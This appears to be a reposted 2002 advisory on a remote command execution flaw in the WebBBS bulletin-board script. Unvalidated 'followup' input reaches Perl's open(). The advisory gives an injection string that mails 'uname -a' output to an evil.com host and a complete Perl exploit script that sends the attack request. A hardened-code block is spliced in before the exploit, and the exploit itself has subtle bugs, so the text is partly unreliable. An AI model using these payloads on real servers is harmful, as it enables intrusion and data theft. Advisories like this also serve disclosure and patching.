WebBBS remote command execution (APP, flaw)
Affected programs:
WebBBS 5.0 (and later versions)
Description:
WebBBS 5.0 allows an attacker to execute commands remotely over the web.
Details:
WebBBS is a widely deployed, web-based BBS (bulletin board) service program that stores its data as text files.
The posting script webbbs_post.pl of WebBBS allows an attacker to use special characters to make the web server execute arbitrary commands. The flawed code segment is as follows:
Vulnerable:
WebBBS by Darryl Burgdorf
-----
webbbs_post.pl:
...
if ($FORM{'followup'}) { $followup = "$FORM{'followup'}"; }
...
if ($followup) {
...
$subdir = "bbs".int($followup/1000);
open (FOLLOWUP,"$dir/$subdir/$followup");
-----
From the code above: the value of the followup form field reaches the two-argument form of open() unchecked, and Perl treats a filename ending in "|" as a command to run and read from. So if special characters are appended to the $followup value, commands can be executed:
"followup=10;uname -a|mail zlo@evil.com|"
Solution:
Watch for the upgrade provided by the vendor at:
http://awsd.com/scripts/webbbs/
or add input validation statements for the variable in webbbs_post.pl.
Attack method:
Perl attack script:
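A hardened form of the webbbs_post.pl fragment above, added here as an illustration of the suggested variable check; it is not the vendor's patch. It keeps the advisory's %FORM hash, $dir and path layout, and everything else (function names, the sample inputs) is assumed.

```perl
#!/usr/bin/perl
# Added example, not vendor code: hardened handling of the WebBBS
# "followup" parameter. Assumes the same %FORM hash and $dir as the
# advisory's snippet; function names and sample values are constructed.
use strict;
use warnings;

# Allow-list check: a followup id is a short decimal number and nothing
# else. Only the captured digits are used afterwards, so ';', '|' and
# other shell metacharacters can never reach open().
sub validated_followup {
    my ($raw) = @_;
    return undef unless defined $raw;
    return $raw =~ /\A(\d{1,9})\z/ ? $1 : undef;
}

# Same path construction as the original, built from the validated
# integer only.
sub followup_path {
    my ($dir, $followup) = @_;
    my $subdir = "bbs" . int($followup / 1000);
    return "$dir/$subdir/$followup";
}

# Reads the followup message with three-argument open(), which opens a
# plain file and never interprets the name as a pipe or command.
sub read_followup {
    my ($dir, %FORM) = @_;
    my $followup = validated_followup($FORM{'followup'});
    unless (defined $followup) {
        warn "rejected followup value\n";
        return undef;
    }
    my $path = followup_path($dir, $followup);
    open(my $fh, '<', $path) or do {
        warn "cannot open $path: $!\n";
        return undef;
    };
    local $/;
    my $text = <$fh>;
    close $fh;
    return $text;
}

# Constructed sample inputs: a normal id, the advisory's injection
# string and a traversal attempt. Only the first is accepted.
for my $value ('10', '10;uname -a|mail zlo@evil.com|', '../../etc/passwd') {
    my $ok = validated_followup($value);
    printf "%-36s -> %s\n", $value, defined $ok ? "accepted ($ok)" : "rejected";
}
```

read_followup() is the drop-in replacement for the open() shown above; the loop at the end only exercises the check on the sample values.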
#!/usr/bin/perl
#
# nerF gr0up
#
# exploit code for
# WebBBS by Darryl C. Burgdorf
# all versions up to 5.00 are vulnerable
#
#
# this is an exploitation of "followup" bug.
# it allows remote attacker to execute shell commands.
# you can find WebBBS script at http://awsd.com/scripts/webbbs/
#
# 06.06.2002
# btr // nerf
# nerf.ru
use IO::Socket;
srand();
$script = "/cgi-bin/webbbs/webbbs_config.pl";
$command = "uname -a|mail zlo@evil.com";
$host = "localhost";
$port = 80;
$content = "$content" . "name=" . rand(254);
$content = "$content" . "&email=" . rand(254);
$content = "$content" . "&subject=" . rand(254);
$content = "$content" . "&body=" . rand(254);
$content="$content"."&followup=".rand(254)."|$command|";
$content_length = length($content);
$content_type = "application/x-www-form-urlencoded";
if (@ARGV) {$command=@ARGV;}
if (@ARGV) {$host=@ARGV;}
if (@ARGV) {$script=@ARGV;}
$buf = "POST " . "$script" . "?post HTTP/1.0\n";
$buf = "$buf" . "Content-Type: $content_type\r\nContent-Length:";
$buf = "$buf" . "$content_length\r\n\r\n$content", 0;
print "\tnerF gr0up\n";
print "exploit: WebBBS (awsd.com), version up to 5.00\n";
print "sent:\n$buf\n";
if($socket = IO::Socket::INET->new("$host:$port")){
print $socket "$buf";
read($socket,$buf,1500);
print "received:\n$buf\n";
}
Additional information:
None
Related sites:
http://awsd.com/scripts/webbbs/
Published: 20 June 2002